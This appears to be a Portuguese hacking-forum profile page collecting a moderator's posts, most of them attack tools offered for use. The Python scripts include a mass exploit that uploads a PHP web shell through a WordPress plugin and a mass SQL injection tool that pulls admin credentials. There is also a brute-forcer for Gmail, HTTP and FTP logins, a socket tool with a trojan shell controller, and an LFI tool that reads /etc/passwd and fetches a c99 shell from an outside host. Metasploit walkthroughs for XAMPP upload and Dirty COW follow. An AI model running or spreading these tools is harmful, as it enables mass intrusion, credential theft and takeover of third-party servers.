Ir para conteúdo

FaceOs

Moderadores
  • Total de itens

    83
  • Registrado em

  • Última visita

  • Dias Ganhos

    7

FaceOs ganhou o dia em 22 de junho

FaceOs teve o conteúdo mais curtido!

Reputação

29 Excelente

2 Seguidores

Sobre FaceOs

  • Rank
    FaceOs

Últimos Visitantes

120 visualizações
  1. E aí pessoal, hoje trago à vocês um curso de redes de computadores, matéria essencial para estudos sobre hacking e segurança da informação, contendo com 52 vídeos, com uma explicação curta e fácil de entender, distribuído pela Bóson Treinamentos de forma gratuita. LINK: https://www.youtube.com/playlist?list=PLucm8g_ezqNpGh95n-OdEk06ity7YYfvU
  2. Eae pessoal, criei esse exploit em massa, para explorar uma vulnerabilidade no tema Inboundio, a qual lhe permite enviar arquivos (Shell) de forma arbitrária. #!/usr/bin/python #Escrito por Derick Santos #Conheca a FSociety Brasil: https://www.fsocietybrasil.org.br/ try: try: from colorama import * import colorama except: print "[!] ERRO! Necessario a biblioteca COLORAMA! Instale com - \n\n pip install colorama OU easy_install colorama" sys.exit(1) try: import requests except: print Fore.RED+"[!] ERRO! Necessario a biblioteca REQUESTS! Instale com - \n\n pip install requests OU easy_install requests" sys.exit(1) import platform import time import sys import os so = platform.system() if so == "Windows": cleaning = os.system("cls") else: cleaning = os.system("clear") try: lista = raw_input(Fore.WHITE+"Lista de sites: ") list = open(lista, "rb") except: print Fore.RED+"[!]"+Fore.WHITE+" Erro! O arquivo nao foi encontrado." for sites in list: sites = sites.rstrip() if "http://" not in sites: sites = "http://"+sites else: sites = sites print Fore.BLUE+"\n[!]"+Fore.WHITE+" SITE - {}\n".format(sites) payload = {"file" : "<?php system($_GET['shell']); ?>" } path_vul = "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" id_vul = sites+path_vul id_process = requests.get(id_vul) if id_process.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"[!]"+Fore.WHITE+" Testando exploit!" exploiting = requests.post(id_vul,files=payload) if exploiting.status_code == 200: verifica_shell = requests.get("/inboundio-marketing/admin/partials/uploaded_csv/?shell=") if verifica_shell.status_code == 200: print Fore.GREEN+"[!]"+Fore.WHITE+" Shell upada! - {}".format(sites+"/inboundio-marketing/admin/partial/uploaded_csv/?shell=[CMD]") else: print Fore.RED+"[!]"+Fore.WHITE+" Shell nao upada!" else: print Fore.RED+"[!]"+Fore.WHITE+" SITE NAO VULNERAVEL!" else: print Fore.RED+"[!]"+Fore.WHITE+"SITE NAO VULNERAVEL!" except KeyboardInterrupt: print Fore.RED+"\n[!]"+Fore.WHITE+" Ate mais!" sys.exit(1)
  3. WEBSPERT_SQLinjection_mass_exploit

    WEBSPERT_SQLinjection_mass_exploit E ai pessoal, criei esse exploit em massa que realiza SQL Injection via GET no "CMS" Webspert a qual esta vulneável a falha, e a partir desse exploit, conseguimos pegar a senha e o usuario do administrador. O exploit foi escrito em Python e necessário as bibliotecas: Requests e Colorama. Para instala-las: pip install requests/pip install colorama OU easy_install requests/easy_install colorama. #!/usr/bin/python try: try: from colorama import * import colorama except ImportError: print "[!] ERROR! Biblioteca colorama nao disponivel!\n Instale com: pip install colorama" sys.exit(1) import requests import platform import time import sys import os import re colorama.init() so = platform.system() if so == "Linux": cleaning = os.system("clear") else: cleaning = os.system("cls") print Fore.GREEN+""" *********************************** ***** MASS EXPLOIT ***** ***** WEBSPERT SQL INJECTION ***** ***** ***** *********************************** +++++++++++++++++++++++++++++++++++++++++++++++++ Desenvolvido por Derick Santos Conheca a Fsociety Brasil: https://www.fsocietybrasil.org/ """ web = raw_input(Fore.YELLOW+"Lista de sites: ") site = open(web) for sites in site: host = sites.rstrip() print Fore.BLUE+"\n[!] ALVO - {}\n".format(host) payload_id = "%27" r = requests.get("http://"+host+"/"+payload_id) code = r.text if r.status_code == 200: print Fore.BLUE+"[!] O SITE PARECE SER VULNERAVEL!" time.sleep(3) print Fore.GREEN+"\n[!] Aplicando payload de exploracao!" payload_vul = "&pageid=26 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5,6 from administrators--" r = requests.get("http://"+host+payload_vul) html = r.text if re.search("admin",html): time.sleep(3) print Fore.GREEN+"\n[!] O SITE E VULNERAVEL!\n Coletando senha do administrador..." passe = re.findall(r'admin[\w:]+[\w,]+[\w:]+[\w:]+[\w<]', html) for senha in passe: password = senha.rstrip() if password == "administrator": print "" time.sleep(1) print Fore.GREEN+"\nUsername and password - \n {}".format(password) else: time.sleep(1) print Fore.GREEN+"\nUsername and password - \n {}".format(password) else: print Fore.RED+"\n[!] Site nao vulneravel!" except ImportError: print Fore.RED+"[!] ERROR! Biblioteca requests nao disponivel!\n Instale com: pip install requests" except KeyboardInterrupt: print Fore.RED+"Ate mais!"
  4. Invadindo servidor SQL com METASPLOIT

    O Metasploit, como vocês já sabem é uma ferramenta que vale muito a pena estudar. Estou trazendo mais um vídeo com um módulo dele, ensinando a realizar SQL injection e conseguir meterpreter na aplicação através da falha. https://youtu.be/Wfm-Yu03Nn0
  5. EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT Bem pessoal, hoje vou lhes apresentar um exploit muito bacana no XAMPP que inclusive possui um módulo no Metasploit. Primeiramente, precisamos do Metasploit Framework no computador, certo? Ele possui tanto suas versões para Linux e Windows, através do site da Rapid7. Então, com o Metasploit instalado, vamos começar. Se você estiver no Windows, vá até a pasta do Metasploit e digite: msfconsole Ou console Caso esteja no Linux, instale com o install.sh ou mova os scripts do MSF para o "/root/bin". Pronto, quando o Metasploit carregar, digite: use exploit/windows/http/xampp_webdav_upload_php Após isso, irá carregar o módulo do exploit. Agora a gente irá setar as funções: RHOST, RPORT e EXPLOIT. No RHOST - A gente irá mencionar o nosso site/ip alvo. No RPORT - A gente irá setar a porta da conexão do alvo, pode ser 80, 8443, 8090,8033, 8080... Enfim. E no EXPLOIT - Nós iremos rodar o exploit e conseguir o Meterpreter no servidor, ou seja, upar a backdoor e ganhar a shell. Vamos lá então: set RHOST www.target.com set RPORT 80 exploit Ilustrações:
  6. Sim, sim. Jaja faço umas alterações no código. Eu esqueci de alguns detalhes, como a função help ;___;
  7. ServiceBrute - Ferramenta para ataques de brute-force em serviços SMTP, FTP e HTTP Como eu não consigo passar um dia sem escrever código, hoje não seria diferente :v Criei esse simples código para ataques de brute-force em serviços SMTP (G-Mail), FTP e HTTP. Segue o código: #!/usr/bin/python # -*- coding: cp1252 -*- from ftplib import FTP import smtplib import sys import os import platform import ftplib try: import colorama from colorama import Fore, Back, Style except ImportError: print "ERRO! - Necessario a biblioteca COLORAMA. \n Instale com - easy_install colorama" try: import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning except ImportError: print Fore.RED+"ERRO! - Necessario a biblioteca REQUESTS. \n Instale com - easy_install requests" colorama.init() so = platform.system() if(so=="Windows"): os.system("cls") else: os.system("clear") try: def help(): ajuda = """ HELP MODULE - ServiceBrute servicebrute.py --form 1 --email <target_email> --wordlist <passfile.txt> Example: servicebrute.py --form 1 --email [email protected] --wordlist passwordfile.txt servicebrute.py --form 2 --user <target_user> --wordlist <passfile.txt> --target <target_url> Example: servicebrute.py --form 2 --user admin --wordlist passwordfile.txt --target http://www.target.com servicebrute.py --form 3 --user <target_user> --wordlist <passsfile.txt> --target <target_url> Example: servicebrute.py --form 3 --user admin --wordlist passwordfile.txt --target http://www.target.com servicebrute.py --form 4 --user <target_user> --wordlist <passfile.txt> --target <target_url> Example: servicebrute.py --form 4 --user admin --wordlist passwordfile.txt --target ftp.target.com """ print(Fore.CYAN+ajuda) x = sys.argv if x[1] == "--form": forma = sys.argv[2] if forma == "1": if x[3] == "--email": email = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] wordlist = open(wordlist, "r") smtp = smtplib.SMTP("smtp.gmail.com", 587) smtp.ehlo() smtp.starttls() for senhas in wordlist: try: smtp.login(email, senhas) print Fore.GREEN+"Senha encontrada : \n E-mail - %s \n Senha - %s"%(email,senhas) break except smtplib.SMTPAuthenticationError: print Fore.RED+"Tentando login : \n E-MAIL - %s \n SENHA - %s"%(email,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "2": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] for senhas in senha: r = requests.get(target+"/login.php?user="+user+"&password="+senhas) if r.status_code == 302: print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) else: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "3": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] form_user = (str(raw_input(Fore.GREEN+"Formulario de usuario: "))) form_pass = (str(raw_input(Fore.GREEN+"Formulario de senhas: "))) for senhas in senha: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) payload = { form_user : user, form_pass : senhas } r = requests.post(target, data=payload, verify=False) if r.status_code == 302: print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) break else: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "4": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] for senhas in senha: try: ftp = FTP(target) ftp.login(user,senhas) print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) except ftplib.error_perm: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--help": help() except IndexError: banner = """ )\ ) ( ) (()/( ( ( ) ( ( ( )\ ( ( ( /( ( /(_)) ))\ )( /(( )\ ( ))\ )((_) )( ))\ )\()) ))\ (_)) /((_)(()\ (_))\((_) )\ /((_)((_)_ (()\ /((_)(_))/ /((_) / __|(_)) ((_)_)((_)(_) ((_)(_)) | _ ) ((_)(_))( | |_ (_)) \__ \/ -_) | '_|\ V / | |/ _| / -_) | _ \| '_|| || || _|/ -_) |___/\___| |_| \_/ |_|\__| \___| |___/|_| \_,_| \__|\___| Ferramenta para bruteforce em servicos Desenvolvido por Derick Santos Conheça a FSociety Brasil: https://fsocietybrasil.org\n servicebrute.py --help para mais funções\n - [1] G-Mail BRUTEFORCE - [2] HTTP-GET BRUTEFORCE - [3] HTTP-POST BRUTEFORCE - [4] FTP BRUTEFORCE""" print(Fore.YELLOW+banner) except KeyboardInterrupt: print Fore.GREEN+"Até mais..."
  8. Flying - Script para manipulação de sockets

    Flying - Script para manipulação de sockets Pessoal, criei esta ferramenta para "manipulação de sockets" em Python. Ela é bastante parecida com o nc, porém com algumas funções voltadas mais para o pentest. Sendo elas: --listening | Função para escutar portas. --trojan | Função que ativa um cliente de um trojan. --dns | Retorna o Domain Name Service de um endereço IP. --grabing | Realiza um banner grabing HTTP. O código esta disponível para vocês compartilharem e até mesmo alterarem ele. Divirtam-se! #!/usr/bin/python # -*- coding:utf-8 -*- ####################################################### ### Desenvolvido por Derick Santos ### ### Conheça a Fsociety Brasil: fsocietybrasil.org ### ####################################################### try: import platform import socket import sys import os so = platform.system() if so == "Windows": os.system("cls") else: os.system("clear") x = sys.argv def help(): module = """ Flying - Ferramenta em Python para manipulação de sockets Desenvolvido por Derick Santos Conheça a FSociety Brasil: https://fsocietybrasil.org/ ############################################################## flying.py --listening <host> <port> | Escuta determinada porta Exemplo: flying.py --listening 127.0.0.1 3030 flying.py --trojan <host> <port> | Cliente de um trojan Exemplo: flying.py --trojan 127.0.0.1 3030 flying.py --dns <host> | Pegar DNS por endereço IP Exemplo: flying.py --dns 127.0.0.1 flying.py --grabing <host> | Realizar banner grabing em serviços HTTP Exemplo: flying.py --grabing www.google.com""" print(module) try: if(x[1]=="--listening"): host = sys.argv[2] port = (int(sys.argv[3])) print "Escutando porta %s de %s\n"%((port,host)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host,port)) s.listen(1) conn, addr = s.accept() print "Conexao de",addr while True: log = conn.recv(1024) if not log: break conn.sendall(log) conn.close() except: help() try: if(x[1]=="--trojan"): ip = sys.argv[2] port = (int(sys.argv[3])) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((ip,port)) s.listen(5) print "\n: Esperando conexao..." conn, addr = s.accept() msg = conn.recv(512) print(msg) shell = True while shell == True: cmd = raw_input("B:\> ") conn.send(cmd) msg = conn.recv(10000000) print(msg) except: exit() try: if (x[1]=="--dns"): host = sys.argv[2] ip = socket.gethostbyname(host) d = socket.getfqdn(ip) print "DNS -> "+d except: exit() try: if (x[1]=="--grabing"): site = sys.argv[2] port = (int("80")) ip = socket.gethostbyname(site) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect_ex((ip,port)) s.send(b"GET /\n\n") banner = s.recv(10000) print "Banner - %s"%banner except: exit() except KeyboardInterrupt: print "Até mais!"
  9. Explorando falhas de UPLOAD com o BURP SUITE e o METASPLOIT Já disse e repito, o Burp Suite e o Metasploit, são algumas das principais ferramentas neste mundo do hacking. Hoje trago para vocês um vídeo fantástico ensinando a realizar a exploração de falhas de upload com as duas ferramentas. É ensinando no vídeo a criar uma shell (Backdoor) em PHP que realiza conexão reversa com a aplicação lhe dando o acesso ao servidor. É realmente um vídeo bastante interessante e mostra o quão bacana falhas de upload são. Enfim...
  10. Ataque de BRUTE-FORCE em serviços MySQL com o METASPLOIT O ataque de brute-force, é um ataque a qual auditamos em uma aplicação realizando um teste de login, ou seja, o atacante passa a lista de senhas, a lista de usuários e o programa vai tentando o login de forma automática no serviço rodando no alvo. O MySQL é um serviço de gerenciamento de banco de dados, o Metasploit bastante conhecido no mundo da segurança da informação tem módulos para enumerarem em um servidor MySQL. Neste tópico, lhes mostro um vídeo demonstrando um ataque de força bruta em serviços MySQL e um crack de hash MySQL através do próprio Metasploit.
  11. ESCALANDO PRIVILÉGIOS com EXPLOIT DIRTY COW

    ESCALANDO PRIVILÉGIOS com EXPLOIT DIRTY COW A escalação de privilégios, é uma técnica a qual um hacker/cracker invade o sistema e utiliza de exploits ou PoCs (Proof of Concept) para ganhar acessos administrativos ou seja, acessos de superusuarios independente do sistema. Hoje eu trago pra vocês, uma demonstração de uma escalada de privilégios através do exploit Dirty Cow.
  12. LFIFuck E ai pessoal, criei esta ferramenta para explorar falhas de Local File Include em aplicações com a vul. Ela no momento só explora através do "/etc/passwd" e a instalação de shells através de códigos em PHP. #!/usr/bin/python #Ferramenta para exploracao com falhas de Local File Include (LFI) #LFIFuck #Desenvolvido por Derick Santos #Conheca a Fsociety Brasil: fsocietybrasil.org try: import webbrowser import requests import platform import time import sys import os import re so = platform.system() if so != "Linux": os.system("cls") if so != "Windows": os.system("clear") except ImportError: print "[!] Erro! Necessario a biblioteca requests..." print "[!] easy_install.py requests" def help(): print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" print "!!! lfifuck --url www.site.com/index.php?file= !!!" print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" try: argumento = sys.argv if len(argumento) > 3: help() if argumento[1] == "--url": site = argumento[2] else: help() except IndexError: banner = """ ( ( ( ( )\ ) )\ ) )\ ) )\ ) ) (()/( (()/( (()/((()/( ( ( /( /(_)) /(_)) /(_))/(_)) ))\ ( )\()) (_)) (_))_|(_)) (_))_|/((_) )\ ((_)\ | | | |_ |_ _|| |_ (_))( ((_)| |(_) | |__ | __| | | | __|| || |/ _| | / / |____||_| |___||_| \_,_|\__| |_\_\ LFI exploiting tool Desenvolvido por Derick Santos lfifuck.py --help | Para mais informacoes """ print banner try: payload = "../../../../../../../../../../../../../../../etc/passwd" lfi = site+payload r = requests.get("http://"+lfi) html = r.text if r.status_code == 200: print "[/] SITE parece ser vulneravel...\n" if re.search(r"root:x",html): print "[!] SITE : Vulneravel..." time.sleep(1) print "\n[*] PAYLOAD : ADICIONADO : " print "" print "[1] Abrir browser no payload" print "[2] Instalar alguma shell no site\n" opt = raw_input("O que deseja fazer? ") if opt == "1": abrir = webbrowser.open(lfi) if opt == "2": shell_link = '<?php%20system("http://www.c99shell.biz.tr/shell/c99.txt");?>' r = requests.get("http://"+site+shell_link) move = '<?php%20system("mv%20c99.txt%20c99.php");?>' rname = requests.get("http://"+site+move) code = rname.text if re.search(r"c99",code): print "\n[!] SHELL : Adicionada " else: print "\n[!] SHELL : Nao adicionada... Erro no payload!" else: print "[!] SITE : Nao vulneravel!" except requests.exceptions.ConnectionError: print "[!] SITE : Nao vulneravel!" except KeyboardInterrupt: print "[!] Ate mais!" except NameError: print ""
  13. FcSF | FaceOs Framework

    @Unknown Mano, muito obrigado de coração <3
  14. FcSF | FaceOs Framework

    @doug Não sei criar um repositório KKKKKKKKKKKKJJ
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.